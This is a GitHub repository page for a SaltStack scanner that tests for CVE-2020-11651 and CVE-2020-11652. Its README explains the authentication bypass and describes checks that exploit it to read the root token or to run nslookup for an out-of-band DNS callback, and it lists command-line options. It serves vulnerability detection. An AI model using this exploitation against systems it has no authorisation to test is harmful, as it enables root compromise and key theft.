Skip to content
/ salt-rce-scanner-CVE-2020-11651-CVE-2020-11652 Public

Scanning tool to test for SaltStack vulnerabilities CVE-2020-11651 & CVE-2020-11652.

License

MIT license
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

appcheck-ng/salt-rce-scanner-CVE-2020-11651-CVE-2020-11652

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
reporting
reporting
 
 
LICENSE
LICENSE
 
 
README.txt
README.txt
 
 
requirements.txt
requirements.txt
 
 
salt_rce_scanner.py
salt_rce_scanner.py
 
 

Repository files navigation

[1]	What is it?

Scanning tool to test for SaltStack vulnerabilities CVE-2020-11651 & CVE-2020-11652.

The vulnerabilities allow an attacker who can connect to the "request server" port to bypass all authentication
and authorization controls and publish arbitrary control messages, read and write files anywhere on the "master"
server filesystem and steal the secret key used to authenticate to the master as root. The impact is full remote
command execution as root on both the master and all minions that connect to it.

[2] How to install it.

The tool requires Python 2.7 or Python 3. External requirements can be installed with pip or easy_install.
For example:

sudo pip install -r requirements.txt


[3]	How to use it?

There are 2 detection methods included: 

*	Token disclosure	(-t)
	
	This method is invoked with the -t option and attempts to read the Salt root token by exploiting the flaw.
	Whilst this method is self contained, it only works on newer versions, some older versions are not supported.


*	Remote Code Execution to Out-of-Band (DNS) 	(-c)
	
	This method exploits the flaw by executing the nslookup command to trigger a DNS lookup to the Appcheck 
	Sentinel server. The scanner then consults the AppCheck DNS server to determine if it executed. To achieve
 	this the tool needs to connect out to https://ptst.io/

	Note: For further information on sentinel see section [4] below

	Recommended command line: salt_rce_scanner.py -r cidr_ip_range -t -c

[Command Line Options]

  ___              _____ _               _
 / _ \            /  __ \ |             | |
/ /_\ \_ __  _ __ | /  \/ |__   ___  ___| | __
|  _  | '_ \| '_ \| |   | '_ \ / _ \/ __| |/ /
| | | | |_) | |_) | \__/\ | | |  __/ (__|   <
\_| |_/ .__/| .__/ \____/_| |_|\___|\___|_|\_\
      | |   | |
      |_|   |_|

      SaltStack Scanner (CVE-2020-11651 & CVE-2020-11652)
      Author:   Gary O'Leary-Steele
      Version:  0.1 Alpha
Use -h to see usage options

optional arguments:
  -h, --help      show this help message and exit
  -r CIDR_RANGE   Target Host or CIDR Range to scan
  -p PORT         Target Port (4506 by default)
  -c              Enable remote command injection test (out-of-band DNS to
                  AppCheck Sentinel)
  -t              Enable root token disclosure check
  -T THREADS      Maximum Threads (default is 50)
  -o OUTPUT_FILE  Output file


[4]	AppCheck Sentinel

= Background =

Traditionally, web application security flaws are detected by modifying client supplied input in an attempt to trigger 
a specific response from the server. For example, SQL Injection flaws are often detected by submitting payloads that 
cause a signature to be returned by the database server, in other cases, payloads are designed to trigger a specific 
time delay that can be measured to detect the flaw. In each case, these methods use in-band techniques where both the 
attack and response take the same path as regular website traffic and result in immediate confirmation of the 
vulnerability.

= Out-of-Band Detection =

There are cases however where in-band techniques are not effective. For example, consider an ecommerce site that 
collects orders which are then later reviewed via a back-end order processing system. Whilst AppCheck will detect 
vulnerabilities (in-band) within the eCommerce site during a routine scan, vulnerabilities within the back-end order 
processing system may not trigger until they are accessed (by another user or process) later down the line. 

Other common cases arise when triggering the vulnerability does not provide a reliable in-band mechanism to confirm
the flaw. For example, measuring server response times could be unreliable if the normal server response times are 
erratic. In other cases the vulnerability may not impact the way the server responds regardless of whether it is 
successfully exploited or not.

In order to overcome these restrictions, AppCheck implements an Out-of-Band detection system named Sentinel.

Sentinel is a Cloud based monitoring system that hosts specially designed DNS, SMTP, HTTP(s) and SMB services that 
intercept Out-of-band connections triggered as a result of an AppCheck attack payload. 

During a scan, AppCheck submits specially crafted payloads designed to trigger Out-of-Band connections when they are 
successfully executed. Sentinel then detects this execution and updates scan results accordingly. One of the most common 
techniques is the use of DNS tokens embedded within the payload. By design, DNS queries are forwarded to the 
authoritative DNS server for a given domain in order to be resolved. Therefore, even if the vulnerable system is not 
permitted to access the internet, as long as it is able to resolve DNS names it can communicate with Sentinel.

About

Scanning tool to test for SaltStack vulnerabilities CVE-2020-11651 & CVE-2020-11652.

Resources

Readme

License

MIT license
Activity
Custom properties

Stars

0 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages